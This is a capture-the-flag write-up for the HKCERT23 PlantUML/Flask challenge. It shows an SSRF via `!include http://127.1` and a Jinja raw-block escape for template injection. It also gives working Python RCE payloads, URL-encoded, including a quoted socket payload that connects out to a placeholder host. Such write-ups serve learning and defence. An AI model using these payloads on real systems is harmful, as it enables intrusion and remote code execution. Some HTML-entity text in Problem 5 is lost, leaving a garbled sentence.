# ProbablyUnknown's Markup Language
> Tags: Web, ★★★☆☆
> Problem statement: We all know that CS majors must know a long list of markup languages like HTML, XML, etc...
How about IS majors? UML? Is UML even a markup language?
> [Test your UML knowledge!](http://chal.hkcert23.pwnable.hk:28104/)
> (Attachment included in the platform showing the source code)
From: HKCERT23
Solved by: chemistrying (aka DarkChemist)
## Notes before Writeup
Since I am not an expert in Web, if there are any misconceptions, please let me know so that the writeup can be refined (and I can learn more about Web stuff)~
## Brief Introduction About the Problem
You get an UML editor which produces some system diagrams. There is a Flask server running behind. You have to get the flag through `proof.sh`.
## Problem 1
`proof.sh` is under the directory `web`. However, what we are interacting is the PlantUML server instead of the Flask server and have no access to the Flask server directly. How do we get the content of Flask server?
## Insight 1
This PlantUML is an external program so according to last year CTF challenge problems (aka [香港生產力促進局 / CVE 1999](https://github.com/blackb6a/hkcert-ctf-2022-challenges/tree/main/29-cve-1999)), the best way to find some insights is to Google the vulnerabilities of PlantUML.
After clicking serveral links, I find the following webpage (https://huntr.com/bounties/0d737527-86e1-41d1-9d37-b2de36bc063a/).

After more googling, I find a GitHub page (https://github.com/advisories/GHSA-ff3m-68vj-h86p) which contains a reference link (https://huntr.com/bounties/8ac3316f-431c-468d-87e4-3dafff2ecf51/).

These information hints us that we can perform some exploits (or to be more precise, Server-side Request Forgery (SSRF)) in PlantUML server.
## Solution to Problem 1
By combining the above information, we can try by inserting some random websites to see what will happen.
```uml=
@startuml
!include https://www.example.com
a -> b: %load_json()
@enduml
```

This gave us a brief idea of what the whole script is doing: `!include <website>` can include the source of a webpage, while `a -> b: %load_json` is just to create an error, thus showing more of the webpage source.
After this, the second website (linked by GitHub vulnerabilities page) claims that you can access local addresses through this way:

So let's try with `127.1`.
```uml=
@startuml
!include http://127.1
a -> b: %load_json()
@enduml
```

We now get to see the content of the Flask webpage.
## Problem 2
The source of the Flask server is given:
```python3=
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route("/")
def index():
return render_template_string("""{%% raw %%}
<!doctype html>
<html>
<head>
<title>PUML Demo</title>
... (Some metadata and CSS stuff that I will omit here...)
<body>
<div>
<h1>PUML Demo</h1>
<p><textarea>%(puml)s</textarea></p>
<p><a href="https://plantuml.com/">More information...</a></p>
</div>
</body>
</html>
{%% endraw %%}""" % {"puml":request.args.get("puml")})
if __name__ == "__main__":
app.run(host="0.0.0.0", port=80)
```
To simply, the script accepts a parameter named `puml` and it will display the string received to the webpage.
So suppose our query website is `http://127.1?puml=hkcert23`, we will get something like this:

Notice the textarea. We can see that `hkcert23` will appear on the screen.
So the problem is, what can we do with it?
## Insight 2
Since we have no idea, so the best way is still google the answer. I googled `render_template_string vulnerabilities` and we get something like this from https://sl1nki.page/blog/2021/01/24/ssti:

The second example is very similar to our given code: they are both performing string substitution / formatting. So we try to put `{{7*7}}` (`{{ ... }}` is for Expressions to print to the template output according to the [documentation](https://jinja.palletsprojects.com/en/3.1.x/templates/#synopsis)) and see what will happen.

Note: `%7b%7b%37%2a%37%7d%7d` is same as `{{7*7}}` but URL encoded when passing to the parameter. From now on, we will use this encoding to pass to the parameter to avoid errors. I wrote a script to encode all characters but using online encoding tools should also work. Here is the script:
```py=
string = input()
output = ""
for char in string:
output += "%{:02x}".format(ord(char))
print(output)
```
It failed. But at least we know, this problem is very possibly related Server-Side Template Injection (SSTI).
## Problem 3
The only difference is the our given template string has {% raw %} and {% endraw %} wrapped. This Jinja statment renders all stuff inside in raw text, so that's why when we directly put `{{7*7}}` to the parameter, it outputs as raw text and nothing happens. So how do we bypass it?
## Insight 3
Recall XSS attack. We put `</tag><script>alert(1)</script><tag>` to run JavaScript. Can we do the same with Jinja templates?
## Solution to Problem 2 and 3
Let's try inserting `{% endraw %}` in front and `{% raw %}` at the back to see what will happen. Our payload will become `{% endraw %}{{7*7}}{% raw %}` (i.e.: `%7b%25%20%65%6e%64%72%61%77%20%25%7d%7b%7b%37%2a%37%7d%7d%7b%25%20%72%61%77%20%25%7d`)

We got `49`, which is equal to `7*7`! This means the server is evaluating our expression!
## Problem 4
We can finally evaluate expressions. So how do we get access to `proof.sh`?
## Insight 4
From our previous website, it claims that you can perform Remote Code Execution through SSTI:

Since I am not familiar with Python Remote Code Execution, we will once again ~~ab~~utilize google.
I search for `python remote code execution jinja2` and I came across this website (https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti).
After digesting the whole article, we find the most important piece of information from the tutorial:

```python3=
# The class 396 is the class <class 'subprocess.Popen'>
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
# Calling os.popen without guessing the index of the class
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
## Passing the cmd line in a GET param
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
```
(The expressions provided by the website)
So now we do is to try these expressions.
## Solution to Problem 4
Let's try the first one. It is shorter. Now the payload is `{% endraw %}{{''.__class__.mro()[1].__subclasses__()[396]('ls',shell=True,stdout=-1).communicate()[0].strip()}}{% raw %}`.

It failed[^1]. So let's try to next one. Now the payload is `{% endraw %}{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}{% raw %}`[^2]

We got the list of the directory with `proof.sh` included! Let's change the command from `ls` to `./proof.sh`[^3] and see what will happen:

Emm... The flag is cut in half, maybe output the whole file to see the contents inside? Let's change the command from `./proof.sh` to `cat proof.sh`. The encoded payload now is
`%7b%25%20%65%6e%64%72%61%77%20%25%7d%7b%25%20%66%6f%72%20%78%20%69%6e%20%28%29%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%7b%25%20%69%66%20%22%77%61%72%6e%69%6e%67%22%20%69%6e%20%78%2e%5f%5f%6e%61%6d%65%5f%5f%20%25%7d%7b%7b%78%28%29%2e%5f%6d%6f%64%75%6c%65%2e%5f%5f%62%75%69%6c%74%69%6e%73%5f%5f%5b%27%5f%5f%69%6d%70%6f%72%74%5f%5f%27%5d%28%27%6f%73%27%29%2e%70%6f%70%65%6e%28%22%63%61%74%20%70%72%6f%6f%66%2e%73%68%22%29%2e%72%65%61%64%28%29%7d%7d%7b%25%65%6e%64%69%66%25%7d%7b%25%20%65%6e%64%66%6f%72%20%25%7d%7b%25%20%72%61%77%20%25%7d`.

> Hmmm... the author teased me like that... I reckon it's the flag's problem...
Make use of the output to ASCII function in the webpage, we can copy the flag `hkcert23{System_Analysis_&_Design_IS_SAD_0r_SAND?}`.
## Problem 5
I send the flag immediately to the platform but it didn't work, why? The challenge should be finished: the aim should be `proof.sh` because this is what it has given in the source folder (`proof.sh` contains `hkcert23{fakeflag}` in given source folder). What's wrong?
## Insight 5
Since I think this is very unintentional, I opened a ticket in official discord group server:

At this point, I just realised that when I was testing[^4], `<` characters are transformed to HTML-escaped characters. Since `&` is suspicious and doesn't seem like normal words, let's use google once again to see what it is.
## Solution to Problem 5
After googling, I found this result:

So by replacing `&` to `&`, we got the flag `hkcert23{System_Analysis_&_Design_IS_SAD_0r_SAND?}`.
Success!
## Takeaways
1. Google is always helpful when solving CTF challenges.
2. When an external program is used, it is a great idea to check its vulnerabilities. This might give some insights.
3. Remember in this world, HTML escape characters do exist or you will be embarassed like me: knowing the full solution but got stuck by silly stuff. If the challenge author didn't give hints, it might not be possible to solve this challenge even I got the 90%+ of the flag.
[^1]: I tested the payload afterwards by using the following payload `{% endraw %}{{''.__class__.mro()[1].__subclasses__()[396]}}{% raw %}`. Turns out it is not the `<class 'subprocess.Popen'>` like how the article has mentioned but `<class 'werkzeug.routing.matcher.StateMachineMatcher'>` instead. Later I discover the second line expression doesn't need the harcoded index so that's why I used the second line expression later.
[^2]: Encoded payload is now `%7b%25%20%65%6e%64%72%61%77%20%25%7d%7b%25%20%66%6f%72%20%78%20%69%6e%20%28%29%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%7b%25%20%69%66%20%22%77%61%72%6e%69%6e%67%22%20%69%6e%20%78%2e%5f%5f%6e%61%6d%65%5f%5f%20%25%7d%7b%7b%78%28%29%2e%5f%6d%6f%64%75%6c%65%2e%5f%5f%62%75%69%6c%74%69%6e%73%5f%5f%5b%27%5f%5f%69%6d%70%6f%72%74%5f%5f%27%5d%28%27%6f%73%27%29%2e%70%6f%70%65%6e%28%22%6c%73%22%29%2e%72%65%61%64%28%29%7d%7d%7b%25%65%6e%64%69%66%25%7d%7b%25%20%65%6e%64%66%6f%72%20%25%7d%7b%25%20%72%61%77%20%25%7d`.
[^3]: Encoded payload is now `%7b%25%20%65%6e%64%72%61%77%20%25%7d%7b%25%20%66%6f%72%20%78%20%69%6e%20%28%29%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%7b%25%20%69%66%20%22%77%61%72%6e%69%6e%67%22%20%69%6e%20%78%2e%5f%5f%6e%61%6d%65%5f%5f%20%25%7d%7b%7b%78%28%29%2e%5f%6d%6f%64%75%6c%65%2e%5f%5f%62%75%69%6c%74%69%6e%73%5f%5f%5b%27%5f%5f%69%6d%70%6f%72%74%5f%5f%27%5d%28%27%6f%73%27%29%2e%70%6f%70%65%6e%28%22%2e%2f%70%72%6f%6f%66%2e%73%68%22%29%2e%72%65%61%64%28%29%7d%7d%7b%25%65%6e%64%69%66%25%7d%7b%25%20%65%6e%64%66%6f%72%20%25%7d%7b%25%20%72%61%77%20%25%7d`.
[^4]: While I was testing the payload like I mentioned in footnote 1, the result string was actually `<class 'werkzeug.routing.matcher.StateMachineMatcher'>`. `<`, and `>` are obviously HTML-escaped characters that are used to escape `<` and `>` characters respectively.